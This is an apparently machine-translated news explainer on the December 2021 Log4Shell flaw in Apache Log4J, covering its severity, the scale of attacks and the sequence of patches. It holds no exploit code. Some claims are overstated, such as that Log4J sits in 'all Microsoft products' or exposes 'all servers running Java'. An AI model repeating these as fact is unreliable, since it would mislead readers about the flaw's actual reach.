On December 10, the news of the presence of a serious vulnerability in the library was disclosed Apache Log4J, call Log4Shell, which puts almost all applications and software that use Java at risk.
The risk for cybersecurity is high, so much so that it receives a score of 10 out of 10 in the CVSS scale which evaluates this type of vulnerability, and involves a large number of realities, both public and private.
Let's try to understand how the famous Apache open source library works and why this bug risked doing serious damage.
What is Log4J?
Log4J is a library, written in Java code, that allows developers to create log, that is a register of all the operations carried out by anyone who accesses and uses the software. In other words: "its purpose is simply to keep track of everything that happens on the servers, noting every operation performed in a text file"(1).
Log4J It therefore allows application developers to store a large amount of data, useful for monitoring the behavior of the software, both in the development phase and once it is sent online. This makes it much easier for technicians to spot errors, malfunctions and bugs.
This is the library open source best known and popular, used by a huge number of companies around the world. For example, it is integrated into all Microsoft products, Twitter, Amazon, Minecraft, Steam and iCloud, just to name a few.
And, apparently, there is one inside zero day vulnerability that was called Log4Shell.
Log4Shell
Immediately defined as the "single largest and most critical vulnerability of the last decade"(2), Log4Shell is a type bug zero day, which is a vulnerability unknown even to the developers who created the system.
This bug allows hackers who exploit it to anonymously take control of all servers running Java. Which, in practice, translates into illegal activities such as the creation of cryptocurrencies, the installation of malware to steal (and resell) login credentials, ransomware and spying activities.
The threat to cyber security is very serious, due to some factors. Vulnerability in the first place Log4Shell it seems to be very easy to exploit and, as already mentioned, involves a huge amount of software, devices and companies. Suffice it to say that just 12 hours after the announcement of the discovery, over 40 thousand attacks have been recorded, with over 90 countries involved in the world.
Furthermore, the seriousness of the situation also derives from the fact that, due to the very nature of the bug, it is very difficult to understand where and, above all, who these attacks start from. Although, in fact, most of the threats pass through servers located in Russia, this does not necessarily involve the involvement of the Russian government in the matter:
"The Log4Shell attack, in fact, consists of two parts: the first is to send a written web request to a server or a vulnerable device to exploit the vulnerability; the second is to make malware available somewhere that will be downloaded by the target hit by the first action"(3). Not to mention that many attacks use a VPN connection to hide their origin.
As soon as the security flaw became known, although in reality it was already being exploited by hackers, a huge amount of cyber attacks started, some state-sponsored, i.e. connected to the governments of different countries such as China, Iran, North Korea. and Turkey.
Run for cover
Apache, of course, did not stand by and watch. The American company immediately released two patches to solve the problem. However, both were not effective, showing similar vulnerabilities.
Only the third patch, and in particular the version 2.17.0 of Log4J, appears to be immune to the flaw Log4Shell. So far, in fact, all the actors involved who have implemented this version of the library have not reported any security problems.
To reach this solution, however, it took more than 2 weeks. Precious time, which has cost over 4 million cyber attacks, with the 43% of Italian companies affected, and damages for a figure that is and will be difficult to establish.
With the'announcement of the definitive closure of the flawhowever, it does not mean that we can let our guard down. The Italian cybersecurity agency warns that the new version of Log4J focuses its attention on vulnerability CVE-2021-44832, which, however, could execute lines of code from someone who is already inside the system, previously penetrated. While this is considered a minor threat, it remains of paramount importance to upgrade.
Follow us on our site to stay updated on the latest news.
